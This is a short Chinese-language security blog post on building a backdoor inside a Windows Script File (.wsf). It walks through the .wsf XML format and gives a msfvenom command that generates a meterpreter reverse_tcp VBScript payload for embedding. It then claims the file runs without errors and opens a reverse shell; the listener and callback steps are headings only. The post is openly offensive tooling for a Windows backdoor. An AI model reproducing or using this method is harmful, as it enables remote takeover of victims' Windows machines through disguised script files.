本文由玄魂工作室--安全群 嘉宾“江河” 提供。
前天在群里问了如何生成.wsf msf马,今天写出了实例,分享出来,同时期待亮神的佳作。
首先了解wsf是啥语言,可参考文章如下:
https://www.cnblogs.com/vitrox/p/5137441.html |
---|
https://blog.csdn.net/leyvan/article/details/3746683 |
http://book.51cto.com/art/201111/300472.htm |
wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,
Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。
wsf后门思路:
1)学习.wsf脚本格式
2)msf生成vbs
3) msf生成vbs插入.wsf脚本格式
4)尝试运行查看是否报错
5)反弹shell
开始制作脚本:
1) .wsf脚本格式
<package><job id="IncludeExample"> <script language="VBScript"> </script></job></package> |
---|
2) msf生成vbs
msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport= EXITFUNC=thread -f vbs--platform win > test.vbs
3) msf生成vbs插入.wsf脚本中
4)尝试运行无查看是否报错:
直接运行无报错
使用cscript.exe (WindowsScript Host引擎),运行无报错:
5)反弹shell
监听:
反弹:
知识补充: